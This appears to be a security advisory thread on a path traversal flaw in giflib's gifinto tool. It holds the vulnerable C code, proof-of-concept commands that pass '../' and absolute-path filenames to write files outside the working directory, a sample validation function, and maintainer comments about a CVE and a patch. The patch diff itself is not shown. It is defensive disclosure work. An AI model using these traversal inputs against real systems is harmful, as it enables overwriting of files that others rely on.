# Summary
Path Traversal vulnerability in giflib's `gifinto` utility allows creation of files in arbitrary directories due to insufficient validation of user-supplied filenames.
# Report Description
Path Traversal vulnerability in giflib’s `gifinto` utility allows attackers to create or overwrite files in arbitrary directories due to insufficient validation of user-supplied filenames.
# Vulnerability Description
File: `gifinto.c`
The utility accepts a filename via command-line arguments (parsed by `GAGetArgs()`), extracts its directory portion, and uses it to create a temporary file (`TempInto.XXXXXX`).
If the input file exceeds `MinFileSize` (14 bytes), the temporary file is renamed to the original filename.
However, no validation is performed to prevent the use of `../` (relative path traversal) or absolute paths.
This allows an attacker to supply a crafted filename and cause file creation in unintended locations.
## Vulnerable Code Snippet
```c
/* Isolate the directory where our destination is, and set tmp file name */
/* in the very same directory. This code is insecure because it creates */
/* predictable names, but it's not worth the effort and risk to fix. */
if (*FileName == NULL) {
    GIF_EXIT("No valid Filename given.");
}
if (strlen(*FileName) > STRLEN - 1) {
    GIF_EXIT("Filename too long.");
}
memset(FullPath, '\0', sizeof(FullPath));
strncpy(FullPath, *FileName, STRLEN);
if ((p = strrchr(FullPath, '/')) != NULL ||
    (p = strrchr(FullPath, '\\')) != NULL) {
    p[1] = 0;
} else if ((p = strrchr(FullPath, ':')) != NULL) {
    p[1] = 0;
} else {
    FullPath[0] = 0; /* No directory or disk specified. */
}
if (strlen(FullPath) > STRLEN - 1) {
    GIF_EXIT("Filename too long.");
}
strncpy(FoutTmpName, FullPath, STRLEN); /* First setup the Path */
/* then add a name for the tempfile */
if ((strlen(FoutTmpName) + strlen(DEFAULT_TMP_NAME)) > STRLEN - 1) {
    GIF_EXIT("Filename too long.");
}
strcat(FoutTmpName, DEFAULT_TMP_NAME);
#ifdef _WIN32
char *tmpFN = _mktemp(FoutTmpName);
#endif
```
# Reproduction Steps / Proof of Concept (PoC)
## 1. Compile the Utility
```sh
gcc -o gifinto gifinto.c getarg.c -I.
```
## 2. Create a Minimal GIF File
```sh
echo -n "GIF89a1234567890" > test-sandeep.gif
```
## 3. Normal Operation (Expected Behavior)
```sh
cat test-sandeep.gif | ./gifinto output-sandeep.gif
```
Expected:
`output-sandeep.gif` is created in the current directory.
## 4. Exploit Using Path Traversal
```sh
cat test-sandeep.gif | ./gifinto ../traversal-sandeep.gif
cat test-sandeep.gif | ./gifinto /tmp/absolute-sandeep.gif
```
Observed:
Files are created outside the intended directory (e.g., in the parent directory or `/tmp`), confirming the vulnerability.
## Verification
```sh
ls -l output-sandeep.gif ../traversal-sandeep.gif /tmp/absolute-sandeep.gif
```
# Impact Analysis
This vulnerability can be exploited by any user or attacker with access to execute the vulnerable gifinto utility.
By supplying a malicious filename containing relative or absolute paths, an attacker can create or overwrite arbitrary files on the file system.
Exploiting this flaw may lead to:
- File Overwrite/Corruption: Unauthorized modification or replacement of critical system or application files.
- Denial-of-Service (DoS): Disruption of normal operations by corrupting essential files.
- Privilege Escalation / Arbitrary Code Execution: If critical executables or scripts are overwritten, the attacker may escalate privileges or execute arbitrary code.
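
The validation the report says is missing could look like the following. This is an added example, not part of the original report and not giflib's patch; the function name `filename_is_confined` and the buffer size 512 are assumptions made for illustration.

```c
#include <stdbool.h>
#include <stdio.h>
#include <string.h>

/* Hypothetical helper, not giflib code. The snippet above treats '/', '\\'
 * and ':' as directory delimiters, so the check covers the same three. */
static bool is_sep(char c) { return c == '/' || c == '\\'; }

/* True only if `name` is a relative path with a file component and no ".."
 * component, shorter than `maxlen` bytes (the caller's buffer size). */
bool filename_is_confined(const char *name, size_t maxlen)
{
    if (name == NULL || name[0] == '\0' || strlen(name) >= maxlen)
        return false;
    if (is_sep(name[0]))                 /* absolute: "/tmp/x", "\\x" */
        return false;
    if (strchr(name, ':') != NULL)       /* drive or device prefix: "C:x" */
        return false;
    if (is_sep(name[strlen(name) - 1]))  /* "dir/" names no file */
        return false;

    /* Walk the components. Any ".." is refused, even "a/../b": if "a" is a
     * symlink, that string can still resolve outside the directory. */
    for (const char *p = name; *p != '\0';) {
        size_t len = 0;
        while (p[len] != '\0' && !is_sep(p[len]))
            len++;
        if (len == 2 && p[0] == '.' && p[1] == '.')
            return false;
        p += len;
        while (is_sep(*p))
            p++;
    }
    return true;
}

int main(void)
{
    /* Constructed inputs: the three filenames used in the report's PoC.
     * 512 is an assumed buffer size, not the project's STRLEN value. */
    const char *names[] = { "output-sandeep.gif", "../traversal-sandeep.gif",
                            "/tmp/absolute-sandeep.gif" };
    for (size_t i = 0; i < sizeof names / sizeof names[0]; i++)
        printf("%-28s %s\n", names[i],
               filename_is_confined(names[i], 512) ? "accept" : "reject");
    return 0;
}
```

The check is purely lexical: it does not detect a symlink that already exists at one of the accepted path components.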
@thecybersandeep are you aware of any CVE assigned to or requested for this?
Hi @hartwork,
I have already requested a CVE for this vulnerability.
Once the CVE ID is assigned, I will update you and add it here.
@thecybersandeep perfect, thank you!
@thecybersandeep maybe I overlooked something — did you create a patch? Are you aware of a patch for this by anyone else?
@thecybersandeep greetings, any updates on the topics of CVE number and/or availability of a patch? Thanks!
@hartwork Thanks for asking!
CVE Number Update:
I’ve already submitted a request for a CVE ID for this issue. Got a confirmation email with a request ID, so it’s in process with the CVE Assignment Team.
Patch Details:
I’m hoping this will help secure gifinto properly!
I’ll keep you posted on the CVE updates. If you have more questions, just ping me!
Best,
Sandeep
Diff:
Fix pushed.